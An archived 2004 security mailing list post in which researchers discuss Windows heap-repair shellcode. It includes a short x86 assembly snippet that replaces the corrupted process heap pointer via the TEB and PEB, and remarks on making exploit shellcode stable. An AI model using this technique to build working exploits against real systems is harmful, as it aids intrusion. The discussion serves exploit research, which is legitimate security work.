Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

dailydave logo Dailydave mailing list archives

Re: Fix heap code
From: dave <dave () immunitysec com>
Date: Fri, 18 Jun 2004 21:00:41 -0400
Well, that's certainly smaller than my code! :> My original code was similar to this, although I also replaced all the other heaps stored in the PEB with one from HeapCreate, and then went through and did a SP-dependant replacement of various global variables where MSVCRT and WS2_32 had stored a copy of the default heap.
I've basically given up on that way except for special cases now though. Although future mallocs will take place with the new heap, free() on a corrupted heap can still crash the program. For most people this doesn't really matter, as their shellcode CreateProcess()'s immediately and does some simple anonymous pipe stuff, but the CANVAS shellcode is a bit more complex, and requires the full API to be steady.
Of course, my shellcode is now a whopping 1259 bytes, which does have its disadvantages. I can hear dildog now: "What are you writing, an MFC shellcode?" 

-dave



Cesar wrote:


Hi.

Dave was talking about some generic fix heap code, i'm
working in a new Windows local heap hole, and i'm
using the next code to fix the heap, it's working ok
on W2k, i just thought i would share this and hear
comments:
                                                                //Fixing  the heap
        mov eax, dword ptr fs:[0x18]    // Get pointer to TEB
        mov eax, dword ptr[eax+0x30]    // Get pointer to the
PEB from TEB.
        lea ebx, dword ptr[eax+0x18]    // Get pointer to
process heap from PEB
        mov eax, dword ptr[eax+0x90]    // Get pointer to heaps
list
        lea eax, [eax+0x4]              
        mov eax, [eax]                                  // Get pointer to next heap in
list
        mov [ebx], eax                  // Replace process
heap with next heap in list


Cesar.


                
__________________________________
Do you Yahoo!?
Yahoo! Mail - Helps protect you from nasty viruses.
http://promotions.yahoo.com/new_mail
_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://www.immunitysec.com/mailman/listinfo/dailydave



_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://www.immunitysec.com/mailman/listinfo/dailydave

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]